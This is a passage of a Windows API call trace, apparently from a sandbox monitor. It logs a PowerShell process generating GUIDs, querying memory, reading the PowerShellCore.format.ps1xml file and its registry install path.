	[0286.554] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xecf0a7e4, Data2=0xb660, Data3=0x4481, Data4=([0]=0x83, [1]=0xd9, [2]=0xab, [3]=0x1a, [4]=0x2e, [5]=0x1f, [6]=0x39, [7]=0x57))) returned 0x0
	[0286.554] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xff71fadd, Data2=0x39f6, Data3=0x4aca, Data4=([0]=0xa5, [1]=0xad, [2]=0xb3, [3]=0x25, [4]=0xfe, [5]=0x30, [6]=0x7c, [7]=0x94))) returned 0x0
	[0286.554] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.554] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.554] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xaeacbdbe, Data2=0x3508, Data3=0x4501, Data4=([0]=0xac, [1]=0x20, [2]=0xef, [3]=0xaf, [4]=0xa4, [5]=0xf0, [6]=0x5b, [7]=0x7f))) returned 0x0
	[0286.555] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xc8bbad46, Data2=0x6bc3, Data3=0x409f, Data4=([0]=0x83, [1]=0x12, [2]=0xea, [3]=0x52, [4]=0x2f, [5]=0x98, [6]=0x1, [7]=0x2a))) returned 0x0
	[0286.555] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xa2178bdd, Data2=0x91c5, Data3=0x4403, Data4=([0]=0x98, [1]=0x48, [2]=0xa5, [3]=0x2b, [4]=0x54, [5]=0xb5, [6]=0xde, [7]=0x31))) returned 0x0
	[0286.555] SetErrorMode (uMode=0x1) returned 0x1
	[0286.555] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0286.555] GetFileType (hFile=0x1c8) returned 0x1
	[0286.556] SetErrorMode (uMode=0x1) returned 0x1
	[0286.556] GetFileType (hFile=0x1c8) returned 0x1
	[0286.556] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.556] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.556] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.556] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.556] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.557] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.557] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.557] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.557] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.558] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.558] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.558] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.558] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.559] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.559] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.559] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.559] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.561] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.561] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.561] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.561] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.562] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0xe67, lpOverlapped=0x0) returned 1
	[0286.562] ReadFile (in: hFile=0x1c8, lpBuffer=0x3069ff7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3069ff7*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.562] ReadFile (in: hFile=0x1c8, lpBuffer=0x306aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x306aa28*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.562] SetErrorMode (uMode=0x1) returned 0x1
	[0286.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0286.562] SetErrorMode (uMode=0x1) returned 0x1
	[0286.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.563] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1c8) returned 0x0
	[0286.563] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0286.563] CoTaskMemAlloc (cb=0x5a) returned 0x2dde70
	[0286.563] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2dde70, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0286.563] CoTaskMemFree (pv=0x2dde70) 
	[0286.563] RegCloseKey (hKey=0x1c8) returned 0x0
	[0286.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.564] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf25bbf5d, Data2=0x74b1, Data3=0x46ae, Data4=([0]=0xb7, [1]=0x8b, [2]=0x3f, [3]=0x12, [4]=0xa7, [5]=0x50, [6]=0x3d, [7]=0x67))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xd83ac9a4, Data2=0xb008, Data3=0x46bd, Data4=([0]=0x98, [1]=0x79, [2]=0x94, [3]=0x94, [4]=0x2b, [5]=0xbc, [6]=0x67, [7]=0x36))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf044b09b, Data2=0xb324, Data3=0x410d, Data4=([0]=0x87, [1]=0xab, [2]=0xde, [3]=0x31, [4]=0x2e, [5]=0x40, [6]=0x79, [7]=0xb8))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xab1ab95d, Data2=0xbcd2, Data3=0x416a, Data4=([0]=0xbe, [1]=0xe4, [2]=0xfc, [3]=0x1a, [4]=0x4d, [5]=0x41, [6]=0x52, [7]=0x4e))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x6170e0cc, Data2=0xd7c5, Data3=0x4999, Data4=([0]=0xb6, [1]=0xc, [2]=0x1e, [3]=0xbd, [4]=0xe9, [5]=0x2, [6]=0x4b, [7]=0xa))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xaa3b393, Data2=0x4cca, Data3=0x40dc, Data4=([0]=0xa6, [1]=0x3b, [2]=0x39, [3]=0x79, [4]=0xc0, [5]=0x85, [6]=0x84, [7]=0xd1))) returned 0x0
	[0286.565] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x51611e94, Data2=0x74f1, Data3=0x4920, Data4=([0]=0x9c, [1]=0x5e, [2]=0x7, [3]=0xce, [4]=0x81, [5]=0xa5, [6]=0x34, [7]=0xa3))) returned 0x0
	[0286.566] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.566] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2f296605, Data2=0xf5d4, Data3=0x4644, Data4=([0]=0xb4, [1]=0x59, [2]=0x6b, [3]=0x1e, [4]=0x97, [5]=0xcc, [6]=0xf5, [7]=0xb2))) returned 0x0
	[0286.566] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x7413985, Data2=0xce56, Data3=0x47aa, Data4=([0]=0x88, [1]=0x6b, [2]=0x26, [3]=0x60, [4]=0xa, [5]=0xfa, [6]=0x9, [7]=0x64))) returned 0x0
	[0286.566] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xd450eb41, Data2=0xeacc, Data3=0x4580, Data4=([0]=0x8d, [1]=0xb9, [2]=0xb5, [3]=0x81, [4]=0x16, [5]=0x39, [6]=0xb8, [7]=0x2a))) returned 0x0
	[0286.566] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x19e9c919, Data2=0x889, Data3=0x481d, Data4=([0]=0xbc, [1]=0xae, [2]=0x51, [3]=0xec, [4]=0xde, [5]=0x1a, [6]=0xf3, [7]=0x89))) returned 0x0
	[0286.566] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2c5dd024, Data2=0x10b8, Data3=0x4e2d, Data4=([0]=0x8d, [1]=0xcd, [2]=0x22, [3]=0x30, [4]=0xf0, [5]=0x13, [6]=0x1e, [7]=0xc9))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x804e09ca, Data2=0x84c9, Data3=0x4065, Data4=([0]=0x8d, [1]=0x3e, [2]=0x4b, [3]=0x6c, [4]=0x8d, [5]=0x6a, [6]=0x52, [7]=0x9))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x88377099, Data2=0xf7bc, Data3=0x4d1e, Data4=([0]=0x92, [1]=0x4f, [2]=0x13, [3]=0x48, [4]=0x2d, [5]=0xac, [6]=0x5c, [7]=0xc0))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x552f740, Data2=0x1700, Data3=0x46b9, Data4=([0]=0x88, [1]=0xa6, [2]=0x21, [3]=0xfe, [4]=0x1e, [5]=0xec, [6]=0x94, [7]=0xe1))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xac079ff1, Data2=0xb355, Data3=0x46f1, Data4=([0]=0xbf, [1]=0x21, [2]=0xea, [3]=0x10, [4]=0xcb, [5]=0x23, [6]=0x9a, [7]=0xb2))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x7ac94275, Data2=0x3d7b, Data3=0x4874, Data4=([0]=0x9f, [1]=0xdc, [2]=0x34, [3]=0x83, [4]=0xfc, [5]=0x47, [6]=0x69, [7]=0x37))) returned 0x0
	[0286.567] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x37d6c3d7, Data2=0xf6d5, Data3=0x4d5d, Data4=([0]=0xa2, [1]=0x1b, [2]=0xab, [3]=0x62, [4]=0xb2, [5]=0xa4, [6]=0xa7, [7]=0x4d))) returned 0x0
	[0286.568] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe7eaf547, Data2=0x6e91, Data3=0x4632, Data4=([0]=0xb4, [1]=0x7, [2]=0xf5, [3]=0xe6, [4]=0x94, [5]=0xe2, [6]=0x8f, [7]=0x34))) returned 0x0
	[0286.568] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.568] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.568] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.568] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1004019b, Data2=0x3752, Data3=0x4fe1, Data4=([0]=0x8b, [1]=0x7a, [2]=0xac, [3]=0xde, [4]=0x5, [5]=0xa8, [6]=0xae, [7]=0xa))) returned 0x0
	[0286.568] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x719062cf, Data2=0x3eb, Data3=0x4d2d, Data4=([0]=0x82, [1]=0x91, [2]=0xc, [3]=0x51, [4]=0xb5, [5]=0xcb, [6]=0x87, [7]=0xdc))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4e1f2990, Data2=0xa1a5, Data3=0x4c50, Data4=([0]=0x86, [1]=0x60, [2]=0xd0, [3]=0x1a, [4]=0xe3, [5]=0x6e, [6]=0xec, [7]=0x5c))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xcd51996, Data2=0xde34, Data3=0x470f, Data4=([0]=0x96, [1]=0xcc, [2]=0x24, [3]=0x26, [4]=0xdd, [5]=0x55, [6]=0x7, [7]=0x46))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x9c015b5d, Data2=0x56f9, Data3=0x4016, Data4=([0]=0xbb, [1]=0x49, [2]=0xfa, [3]=0xd4, [4]=0xcf, [5]=0x91, [6]=0x8b, [7]=0x1c))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xca2c260b, Data2=0xa54c, Data3=0x4977, Data4=([0]=0xa7, [1]=0xe3, [2]=0x94, [3]=0x79, [4]=0x6d, [5]=0x3f, [6]=0x2a, [7]=0x8d))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x658cfbff, Data2=0x5bf6, Data3=0x41ab, Data4=([0]=0xa5, [1]=0xe9, [2]=0x15, [3]=0x25, [4]=0x14, [5]=0x90, [6]=0x72, [7]=0xa8))) returned 0x0
	[0286.569] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4235dd97, Data2=0xb188, Data3=0x46a7, Data4=([0]=0x88, [1]=0xef, [2]=0xe0, [3]=0x56, [4]=0x48, [5]=0xdc, [6]=0xa4, [7]=0xc9))) returned 0x0
	[0286.570] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x9d2e1e47, Data2=0x2ac7, Data3=0x44a3, Data4=([0]=0x98, [1]=0x29, [2]=0x6b, [3]=0xec, [4]=0xdf, [5]=0xf, [6]=0xf1, [7]=0x93))) returned 0x0
	[0286.570] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x777f838a, Data2=0x9685, Data3=0x4c93, Data4=([0]=0xad, [1]=0x5f, [2]=0x67, [3]=0xe8, [4]=0x62, [5]=0xc3, [6]=0xf3, [7]=0xbf))) returned 0x0
	[0286.570] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x18ddd639, Data2=0x9ac4, Data3=0x4243, Data4=([0]=0x91, [1]=0x70, [2]=0x69, [3]=0xd8, [4]=0x98, [5]=0x8d, [6]=0x7a, [7]=0xe6))) returned 0x0
	[0286.570] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x194169fe, Data2=0x1858, Data3=0x41e7, Data4=([0]=0x97, [1]=0xcf, [2]=0xf6, [3]=0x8f, [4]=0xf8, [5]=0x39, [6]=0x9a, [7]=0x79))) returned 0x0
	[0286.570] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xb72734f2, Data2=0xbbde, Data3=0x4f2c, Data4=([0]=0x8f, [1]=0x3e, [2]=0x51, [3]=0x9b, [4]=0xdc, [5]=0x2a, [6]=0x96, [7]=0x77))) returned 0x0
	[0286.570] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.571] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xc035f3dd, Data2=0x30e3, Data3=0x4689, Data4=([0]=0xad, [1]=0xd3, [2]=0xcf, [3]=0x71, [4]=0x44, [5]=0x51, [6]=0x3a, [7]=0x4f))) returned 0x0
	[0286.571] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.571] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.572] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xb1546657, Data2=0x9ecf, Data3=0x4d67, Data4=([0]=0xbf, [1]=0x6a, [2]=0x80, [3]=0x90, [4]=0x66, [5]=0x8b, [6]=0xdf, [7]=0x78))) returned 0x0
	[0286.572] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.572] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xa2e62758, Data2=0x4790, Data3=0x45b5, Data4=([0]=0x97, [1]=0xbb, [2]=0x32, [3]=0x9a, [4]=0x2d, [5]=0x5c, [6]=0xff, [7]=0x18))) returned 0x0
	[0286.573] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xeb8d896f, Data2=0x79b4, Data3=0x4e3e, Data4=([0]=0xa0, [1]=0x5b, [2]=0x55, [3]=0xe6, [4]=0x47, [5]=0x70, [6]=0x1f, [7]=0x56))) returned 0x0
	[0286.573] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2e3d5a58, Data2=0x52d, Data3=0x428b, Data4=([0]=0xb8, [1]=0xf9, [2]=0xac, [3]=0xfb, [4]=0x73, [5]=0xba, [6]=0x6c, [7]=0x9e))) returned 0x0
	[0286.573] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xdfcf1f38, Data2=0x97fc, Data3=0x4e54, Data4=([0]=0x81, [1]=0x93, [2]=0x93, [3]=0xd0, [4]=0x7a, [5]=0xe6, [6]=0xe3, [7]=0xf8))) returned 0x0
	[0286.573] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2db24da, Data2=0xbd42, Data3=0x4d4d, Data4=([0]=0xb4, [1]=0x61, [2]=0xab, [3]=0xbf, [4]=0x3c, [5]=0x15, [6]=0x6c, [7]=0x11))) returned 0x0
	[0286.573] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe006389d, Data2=0x737d, Data3=0x444b, Data4=([0]=0xa9, [1]=0x9, [2]=0x69, [3]=0xca, [4]=0xb7, [5]=0x36, [6]=0x12, [7]=0xf4))) returned 0x0
	[0286.574] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x57a0576a, Data2=0x835b, Data3=0x446b, Data4=([0]=0x86, [1]=0x8, [2]=0xeb, [3]=0x3, [4]=0xfa, [5]=0x4f, [6]=0x9, [7]=0x79))) returned 0x0
	[0286.574] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.574] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x5bffbc86, Data2=0x7988, Data3=0x49ad, Data4=([0]=0x99, [1]=0x4d, [2]=0xd4, [3]=0x1b, [4]=0x85, [5]=0x3c, [6]=0x77, [7]=0xcb))) returned 0x0
	[0286.574] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xceba430f, Data2=0x2959, Data3=0x491e, Data4=([0]=0x82, [1]=0xac, [2]=0x3a, [3]=0x89, [4]=0xaf, [5]=0x31, [6]=0xe6, [7]=0xe))) returned 0x0
	[0286.574] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1d2f9a1d, Data2=0x3b94, Data3=0x4ad1, Data4=([0]=0x9c, [1]=0xbb, [2]=0xd, [3]=0xbf, [4]=0xbf, [5]=0x7e, [6]=0xf1, [7]=0x95))) returned 0x0
